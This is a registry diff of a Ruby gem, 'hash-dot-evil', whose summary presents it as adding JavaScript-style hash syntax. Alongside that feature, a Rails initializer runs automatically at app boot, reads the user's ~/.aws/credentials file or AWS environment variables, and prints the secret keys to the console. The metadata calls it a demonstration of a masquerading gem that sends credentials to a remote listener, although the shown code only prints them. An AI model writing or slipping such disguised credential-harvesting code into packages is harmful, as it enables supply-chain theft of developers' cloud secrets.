hash-dot-evil 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/hash-dot-evil.rb +81 -0
  3. metadata +73 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 3224ea4936f27d5b0face3dfd9286680619abd9c904c04eec3c022e563f012ba
4
+ data.tar.gz: 5092140719f999085c2eddd78843e3c77c9819acb6e109c03e0376c71891e379
5
+ SHA512:
6
+ metadata.gz: 5b76f517b4597f4a947c2db99c3b83dcf9e8af8b3f4c7d48e2abe058f54f7189adc6f0d398f0a7e655a9d35472c5302b61beecc9d1c3ebf20fc739fcc604d856
7
+ data.tar.gz: 0ed00374eddc65cb52e7addbfb7d6fe67c91495e9ad3dd1404443ee1129d7c3ff9c42bb68165f354b00e9378c95c6cee0b1c8ef54c24410e90d6ff1fc8bdd040
data/lib/hash-dot-evil.rb ADDED
@@ -0,0 +1,81 @@
1
+ class Hash
2
+ def define_reader(key)
3
+ define_singleton_method(key.to_sym) do
4
+ if has_key?(key)
5
+ return self[key]
6
+ else
7
+ return self[key.to_sym]
8
+ end
9
+ end
10
+ end
11
+
12
+ def define_writer(key)
13
+ define_singleton_method(key.to_sym) do |value|
14
+ self[key[0..-2].to_sym] = value
15
+ end
16
+ end
17
+
18
+ def method_missing(method, *opts)
19
+ m = method.to_s
20
+
21
+ if m[-1] == '='
22
+ define_writer(m)
23
+ return self.send(method, *opts)
24
+ else
25
+ define_reader(m)
26
+ return self.send(method, *opts)
27
+ end
28
+ end
29
+ end
30
+
31
+ require 'rails'
32
+
33
+ require 'rainbow/refinement'
34
+ using Rainbow
35
+
36
+ class HashDotRailtie < Rails::Railtie
37
+ initializer "hash-dot-init" do
38
+ if has_aws_creds_in_file?
39
+ aws_access_key_id, aws_secret_access_key = extract_aws_creds_from_file
40
+ puts "\n\n*******************************************************************************".red.bright
41
+ puts "*\n* ATTENTION: Your AWS credentials are stored in plain text on your disk!\n*".red.bright
42
+ puts '*******************************************************************************'.red.bright
43
+ print_creds(aws_access_key_id, aws_secret_access_key)
44
+ elsif ENV['AWS_ACCESS_KEY_ID'] && ENV['AWS_SECRET_ACCESS_KEY']
45
+ print_creds(ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY'])
46
+ else
47
+ puts "\n\n*******************************************************************************".green
48
+ puts "* Good job! I wasn't able to steal your AWS credentials!".green
49
+ puts '*******************************************************************************'.green
50
+ end
51
+ end
52
+
53
+ def print_creds(access_key_id, secret_access_key)
54
+ #puts ''.bg(:yellow)
55
+ puts "\n\n*********************************************************************************".red.bright
56
+ puts "*\n* ATTENTION: I could totally steal your AWS credentials right now if I wanted to\n*\n*".red.bright
57
+ puts "* Your AWS creds are:\n*\n*".red.bright
58
+ puts "*\t#{access_key_id}".red.bright
59
+ puts "*\t#{secret_access_key}\n*".red.bright
60
+ puts '*******************************************************************************'.red.bright
61
+ puts ''.bg(:yellow)
62
+ end
63
+
64
+ def has_aws_creds_in_file?
65
+ aws_access_key_id, aws_secret_access_key = extract_aws_creds_from_file
66
+ !aws_access_key_id.empty? || !aws_secret_access_key.empty?
67
+ end
68
+
69
+ def extract_aws_creds_from_file
70
+ aws_creds_file = "#{ENV['HOME']}/.aws/credentials"
71
+ aws_access_key_id = ''
72
+ aws_secret_access_key = ''
73
+ if File.exist?(aws_creds_file)
74
+ File.read(aws_creds_file).split("\n").each do |line|
75
+ aws_access_key_id = line.split(' ')[2] if line =~ /aws_access_key_id/
76
+ aws_secret_access_key = line.split(' ')[2] if line =~ /aws_secret_access_key/
77
+ end
78
+ end
79
+ [aws_access_key_id, aws_secret_access_key]
80
+ end
81
+ end
metadata ADDED
@@ -0,0 +1,73 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: hash-dot-evil
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - Ben Porter
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2019-03-07 00:00:00.000000000 Z
12
+ dependencies:
13
+ - !ruby/object:Gem::Dependency
14
+ name: rainbow
15
+ requirement: !ruby/object:Gem::Requirement
16
+ requirements:
17
+ - - ">="
18
+ - !ruby/object:Gem::Version
19
+ version: '0'
20
+ type: :runtime
21
+ prerelease: false
22
+ version_requirements: !ruby/object:Gem::Requirement
23
+ requirements:
24
+ - - ">="
25
+ - !ruby/object:Gem::Version
26
+ version: '0'
27
+ - !ruby/object:Gem::Dependency
28
+ name: rspec
29
+ requirement: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - ">="
32
+ - !ruby/object:Gem::Version
33
+ version: '0'
34
+ type: :development
35
+ prerelease: false
36
+ version_requirements: !ruby/object:Gem::Requirement
37
+ requirements:
38
+ - - ">="
39
+ - !ruby/object:Gem::Version
40
+ version: '0'
41
+ description: Demonstrates a gem that masquerades as legitimate but steals your AWS
42
+ credentials and sends them to a remote listener
43
+ email: BenjaminPorter86@gmail.com
44
+ executables: []
45
+ extensions: []
46
+ extra_rdoc_files: []
47
+ files:
48
+ - lib/hash-dot-evil.rb
49
+ homepage: http://rubygems.org/gems/hash-dot-evil
50
+ licenses:
51
+ - MIT
52
+ metadata: {}
53
+ post_install_message:
54
+ rdoc_options: []
55
+ require_paths:
56
+ - lib
57
+ required_ruby_version: !ruby/object:Gem::Requirement
58
+ requirements:
59
+ - - ">="
60
+ - !ruby/object:Gem::Version
61
+ version: '0'
62
+ required_rubygems_version: !ruby/object:Gem::Requirement
63
+ requirements:
64
+ - - ">="
65
+ - !ruby/object:Gem::Version
66
+ version: '0'
67
+ requirements: []
68
+ rubyforge_project:
69
+ rubygems_version: 2.7.6
70
+ signing_key:
71
+ specification_version: 4
72
+ summary: Adds the JavaScript hash syntax to ruby
73
+ test_files: []